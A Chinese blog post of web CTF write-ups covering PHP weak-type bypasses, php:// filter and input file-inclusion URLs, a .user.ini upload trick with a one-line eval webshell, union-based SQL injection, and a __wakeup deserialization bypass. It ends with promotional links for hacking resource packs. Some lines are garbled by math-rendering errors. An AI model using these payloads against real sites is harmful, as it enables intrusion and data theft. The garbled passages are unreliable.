<?php
$b = 0;
while(True)
{
    if('8b184b' === substr(md5($b),-6,6))
    {
        echo $b;
        break;
    }
    $b++;
}

1. c = ( a r r a y ) j s o n _ d e c o d e ( @ c=(array)json\_decode(@ c=(array)json_decode(@_GET[‘c’]);
2. 解释这个代码 ：

• @$_GET[‘c’]：这段代码首先尝试从GET请求中获取名为"c"的参数的值。
• json_decode()：然后使用json_decode()函数将获取到的JSON字符串解码为PHP对象。
• (array)：最后，使用类型转换操作符(array)将解码后的PHP对象转换为数组。

举个例子，如果你通过URL发送了如下GET请求：

Copy Codehttp://example.com/script.php?c={"name":"John","age":30}

那么上面的PHP代码将把URL中的"c"参数值解析为JSON对象，并转换为PHP数组，类似于下面的结果：

Copy Code$c = array(
    "name" => "John",
    "age" => 30
);

1. if(is_array(KaTeX parse error: Expected ‘EOF’, got ‘&’ at position 4: c) &̲& !is\_numeric(…c[“m”]) && $c[“m”] > 2022)
2. 如果c是数组 并且 !is_numeric(@ c [ " m " ] ) ：使用 i s _ n u m e r i c 函数检查数组 c[“m”]) ： 使用is\_numeric函数检查数组 c[“m”])：使用is_numeric函数检查数组c中名为m的元素的值是否为数字 $c[“m”] > 2022 ： 并且这个m元素的值 需要大于2022
3. 这里就又矛盾了 如果既要求m元素的值不是数字 还需要大于 2022 这里php有一个语言特性 2023m>2022 在进行比较时 php会取一个比较数中前面的数字来进行与后面的数字的比较
4. if(is_array(@KaTeX parse error: Expected ‘EOF’, got ‘&’ at position 9: c[“n”]) &̲& count(c[“n”]) == 2 && is_array($c[“n”][0])){
   $d = array_search(“DGGJ”, $c[“n”]);
   d = = = f a l s e ? d i e ( " n o . . . " ) : N U L L ; f o r e a c h ( d === false?die(“no…”):NULL; foreach( d=false?die(“no…”):NULL;foreach(c[“n”] as k e y = > key=> key=>val){
   $val=“DGGJ”?die(“no…”):NULL;
5. 如果c中名为n元素的值是数组 并且这个数组中有两个元素 并且第1个元素的值也是数组
6. 注意这个arraysearch是个弱类型的比较 是== 而不是 === 也就是说遍历c中n元素的值如果找到值==DGGJ 就继续下面的那个循环 如果找不到就返回FALSE 也就直接终止程序了
7. 接下来进入下面那个循环时 又遍历c中n元素的值 找DGGJ如果找到就终止程序
8. 这个时候就又有矛盾了 又需要值得等于DGGJ 又不能让她出现
9. 这个时候就需要array_search 这个弱类型的比较了
10. 因为他是== 而不是=== 这个时候 如果“cgy”==0 这个等式是 成立的
11. 所以就可以这么进行绕过
12. 所以最后的abc的参数为
13. ?a=1e9&b=53724&c={“m”:“2023x”,“n”:[[],0]}
14. 
15. 获得；flag

4.fileclude（仍是文件包含伪协议绕过）

 WRONG WAY!
<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET["file1"]) && isset($_GET["file2"]))
{
$file1 = $_GET["file1"];
$file2 = $_GET["file2"];
if(!empty($file1) && !empty($file2))
{
if(file_get_contents($file2) === "hello ctf")
{
include($file1);
}
}
else
die("NONONO");
}

分析代码：

• 首先，它检查是否有名为"file1"和"file2"的GET参数传入。
• 然后，将这两个参数的值分别赋给变量file1和file1和file2。
• 接着，它检查file1和file1和file2是否都不为空。
• 如果满足上述条件，并且file2的内容等于"hello ctf"，那么它会包含file2的内容等于"helloctf**"，那么它会包含file1指定的文件。**
• 否则，会输出"NONONO"并终止程序。

1. 现在需要上传file1与file2的值但是还必须将file2的值为hello ctf
2. 仍在考php的伪协议
3. 对于这个===hello ctf
4. 需要用
5. 对于file1则是??filename=php://filter/read=convert.base64-encode/resource=flag.php这段伪协议
6. 又因为使用input这个命令执行的伪协议只能读取post中的data部分 需要抓包才能将data的内容改为hello ctf
7. 最后的url为
8. ?file1=php://filter/read=convert.base64-encode/resource=flag.php&file2=php://input
9. 
10. 必须要在左边写hello ctf 才能使input函数读入这段字符串
11. 因为是用base64编码的所以需要解码一下
12. flag为cyberpeace{4ac5762a8c1149754fecc0727f8245f4}

5.fileinclude

考点：考了cookie的利用 以及文件包含php伪协议的利用

1. 打开后发现页面没有源码什么的
2. 用F12查看页面源代码试试
3. 
4. 源码如下

<?php
if( !ini_get('display_errors') ) {
  ini_set('display_errors', 'On');
  }
error_reporting(E_ALL);
$lan = $_COOKIE['language'];
if(!$lan)
{
	@setcookie("language","english");
	@include("english.php");
}
else
{
	@include($lan.".php");
}
$x=file_get_contents('index.php');
echo $x;
?>

1. 查看源码后发现里面include有可控的变量 cookie 中的language
2. 所以用BP抓包修改cookie中language的值 并用php伪协议来获取flag.php
3. 
4. 发现并没有cookie的值 所以需要我们自己写
5. 
6. 注意这个cookie的赋值必须在connection下面 并且这里将english赋给language后原来的报错没有了
7. 证明填的位置正确了
8. 
9. 所以只需要resource后面写flag即可 因为源码中拼接了.php
10. 最后解码一下即可
11. cyberpeace{b6408b005f630c84392534b561a3b11e} 得到flag

6.easyupload

考点：考文件上传漏洞

1. 先上传.user.ini(必须是.user.ini文件 不能少点 要不然后面蚁剑连接不成功)文件使其包含一个图片 然后再上传一个图片，最后用蚁剑来连接

GIF89a                  
auto_prepend_file=a.jpg

1. 题头GIF89a是为了防止后端检测这个文件的开头是不是JPG或者其他图片格式 可以绕过后端的检测
2. 上传这个文件时用bp上传改一些内容也是防止后端检测
3. 
4. 然后再上传一个jpg文件里面有一句话木马

GIF89a
<?=eval($_REQUEST['cmd']);?> 

1. 
2. 然后将格式改为jpg的格式 继续再bp repeater模块中检测
3. 
4. 这里发现仍然上传不上去
5. 可能是检测了内容 把php删掉改成=试试
6. 
7. 上传成功
8. 
9. 上传成功后，现在需要找到路径才能填蚁剑的那个地址
10. 
11. 这个就是其地址
12. 用蚁剑连接
13. 

7.inget&robots

由此可见是考SQL注入的

1. 用万能钥匙来获得flag即可
2. ?id=1’or 1=1 --+ 有时候需要双引号 有时候单引号 有时候不需要引号 即可获得flag
3. 

1. 这道题考robots协议
2. robots是搜索引擎爬虫协议，也就是你网站和爬虫的协议。

**简单的理解：**robots是告诉搜索引擎，你可以爬取收录我的什么页面，你不可以爬取和收录我的那些页面。robots很好的控制网站那些页面可以被爬取，那些页面不可以被爬取。

主流的搜索引擎都会遵守robots协议**。并且robots协议是爬虫爬取网站第一个需要爬取的文件。爬虫爬取robots文件后，会读取上面的协议，并准守协议爬取网站，收录网站。**

robots文件是一个纯文本文件，也就是常见的.txt文件。在这个文件中网站管理者可以声明该网站中不想被robots访问的部分，或者指定搜索引擎只收录指定的内容。因此，robots的优化会直接影响到搜索引擎对网站的收录情况。

1. 
2. 可以发现这里有flag的文件 所以我们直接在当前目录访问即可
3. 

8. get_post&disabled_button&cookie

1. 用BP抓包上传post方式b的值
2. 

1. 遇到页面没有什么可利用的消息可以按F12来获取信息
2. 
3. 把disable删掉即可
4. 
5. 然后按下按钮

1. 考察cookie的相关信息
2. 按F12
3. 
4. 发现有cookie.php
5. 然后访问cookie.php
6. 然后让我们看http response
7. 

9. 备份文件&ics-06

1. 
2. 猜测是目录扫描，从而找到flag的文件
3. 
4. 扫描后发现这里是空的 点开后有一个文件自动下载
5. 

1. 打开后发现只有这个页面可以打开
2. 
3. 猜测是SQL注入 于是用SQLmap检测有没有sql注入的点
4. 
5. 发现并没有
6. 猜测id=1 这个整数1存在暴力破解
7. 
8. 
9. 
10. 成功找到

10. PHP2

考点：URL解码：%+assic 16进制

1. 页面上问的是：你能认证这个网站么
2. 先F12查看有没有可利用的消息
3. 
4. 发现并没有什么可利用的
5. 尝试访问一下indedx.php
6. 
7. 这道题考的是文件的后缀 phps：文件的源代码
8. 例如 index.phps 查看的就是index.php的源代码
9. 
10. 试着提交的id=admin （注意是在index.php上 而不是index.phps上）
11. 
12. 发现是not allowed 但是源代码中id后经过了url解码 使得解码后的id 与admin相等
13. 于是用url编码admin 但是 admin经过url编码后还是admin 没有变化
14. url解码是 %+ascii16进制 （注意这里百分号 也得是ascii表的16进制形式）
15. 
16. 所以这里将a改为 %2561 25为%的ascii16进制 61为小写字母a的ascii16进制
17. 

11.robots

1. 看了题目后猜测 是robots协议
2. 
3. 然后继续查看flag的文件即可
4. 

12. unserialize3&view_source

核心思想：不让wakeup这个函数执行 只有反序列化异常的情况下（也就是属性值个数大于属性个数的时候即异常）

有一个PHP的类：xctf

有一个flag的对象

wakeup的方法 如果触发了这个方法 就离开了 也就得不到flag的值

?code：将类以参数的形式传给xctf

目标：1.反序列化xctf

步骤：1.先序列化flag对象的值

<?php
class xctf
    {
        public $flag = '111';
    }
$a = new xctf();
echo serialize($a);
?>

O:4:“xctf”:2:{s:4:“flag”;s:3:“111”;}

将1改成2即可绕过wakeup功能

提交url即可

注意：1.如果flag这个对象如果不是公有的对象是私有的话

且如果编译出来的序列化内容 类与对象连在一起 需要在xctf与flag间加%00

也就是改为 %00xctf%00flag

注意这个%00不是空格而是url编码

1. 
2. 题目介绍鼠标右键不管用了
3. 按F12试试
4. 
5. 查看页面源代码发现存在flag
6. cyberpeace{911f212270286f4c4aa587e1216a9a49}

13.weak_auth&simple_php

1. 由这个的提示可以看出 用户名为admin
2. 这时候需要猜密码
3. 于是用BP的密码暴力破解
4. 
5. 输错密码后发现是check.php
6. F12查看页面源代码看看
7. 
8. 发现给了个提示 说 你需要一个字典
9. 所以用BP的暴力破解
10. 
11. 发现flag

1. 首先需要上传一个a的值 a的值必须等于0 而且a还得存在
2. 这里输入?a=0试试 发现并没有反应 可能a=0是不存在的
3. 输入 a=‘0’字符串试试
4. 
5. 发现有反应了
6. 接下来看b
7. 这个b如果是数字的话就会退出 所以b不能是数字 但是不是数字还得大于1234
8. 这里就有php一种弱语言的特性 比如 1235c>1234
9. 所以b=1235c的话 就满足条件了
10. 

14. NewsCenter（SQL注入）

1. 查看页面后发现只有search new那一栏可以输入，尝试输入一些东西看看有没有什么变化的东西
2. 
3. 输入1，2，3后分别有不同的内容回显
4. 猜测是SQL注入
5. 输入1’ or 1=1 #后发现
6. 
7. 回显了news的全部内容
8. 查询可利用的字段
9. 发现到4的时候跳转到了另一个界面
10. 
11. 说明有三个可利用的字段
12. 接下来用union联合查询查询哪几个字段有回显点
13. 
14. 发现2和3有回显点
15. 接下来就是查询数据库 表名 字段的数据
16. 查询数据库：
17. 查询表名：1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #
18. **查询字段名：**1’ union select 1,group_concat(column_name),3 from information_schema.columns

where table_name=“secret_table” # 注意secret_table 必须加上双引号 否则回显不了如果加上双引号也失败 可以将表名改为 十六进制 前面加上0x 例如：0x7365637265745f7461626c65 这样的目的是为了表示后面的数是16进制在编程里面一般都要加入 来区别十进制数

1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7365637265745f7461626c65 # 注意 如果用16进制的话 就不需要加双引号了 同样有回显

1. 接下来查询fl4g这个字段的数据
2. 1’ union select 1,fl4g,3 from secret_table #
3. 
4. 得到flag

15.upload1

1. 
2. 看出文件上传漏洞
3. 先上传一个ctf.php试试
4. 
5. 发现还没点击上传就弹框了
6. 这时候只需要禁用JS脚本即可
7. 
8. 
9. 然后再次上传 发现上传成功
10. 然后用蚁剑连接即可
11. 
12. 

16.xff_referer

1. 考http请求头 IP来源
2. 

X-Forwarded-For 尝试这个

1. 抓包写即可
2. 
3. 接下来需要考虑http 的来源
4. 
5. 

17.command_execution

1. 远程代码执行漏洞
2. 
3. 而且没有任何的WAF
4. 
5. 
6. find / -name “flag*” :这行代码的意思是 从根目录是开始找 flag 以及flag后面仍有东西的文件
7. 

18.web2

<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";

function encode($str){
    //对字符串进行反转   如果是abc  那么就是 cba
    $_o=strrev($str);
    // echo $_o;
        
    for($_0=0;$_0<strlen($_o);$_0++){
       //对字符串进行截取 从0开始 每次截取一个字符
        $_c=substr($_o,$_0,1);
        // 返回ascii的值然后再+1
        $__=ord($_c)+1;
        //把ascii值转会字符串
        $_c=chr($__);
        //把字符串作了一个拼接
        $_=$_.$_c;   
    } 
    return str_rot13(strrev(base64_encode($_)));
}

highlight_file(__FILE__);
/*
   逆向加密算法，解密$miwen就是flag
*/
?>

1. 考点就是写一个解密算法 把源码倒过来写即可

<?php
function decode($str)
{
    $a=base64_decode((strrev(str_rot13($str))));
    for($_0=0;$_0<strlen($a);$_0++){
        //对字符串进行截取 从0开始 每次截取一个字符
         $_c=substr($a,$_0,1);
         // 返回ascii的值然后再+1
         $__=ord($_c)-1;
         //把ascii值转会字符串
         $_c=chr($__);
         //把字符串作了一个拼接
         $_=$_.$_c;   
     } 
     $b=strrev($_);



还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！

`黑客&网络安全如何学习

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

1.学习路线图

攻击和防守要学的东西也不少，具体要学的东西我都写在了上面的路线图，如果你能学完它们，你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等，都是网络安全入门必知必会的学习内容。

（都打包成一块的了，不能一一展开，总共300多集）

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

****大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享

3.技术文档和电子书

技术文档也是我自己整理的，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本，由于内容的敏感性，我就不一一展示了。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

****大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等，感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包，需要的话也可以拿走。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

****大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享

最后就是我这几年整理的网安方面的面试题，如果你是要找网安方面的工作，它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的，如果大家有好的题目或者好的见解欢迎分享。

参考解析：深信服官网、奇安信官网、Freebuf、****等

内容特点：条理清晰，含图像化表示更加易懂。

内容概要：包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

****大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享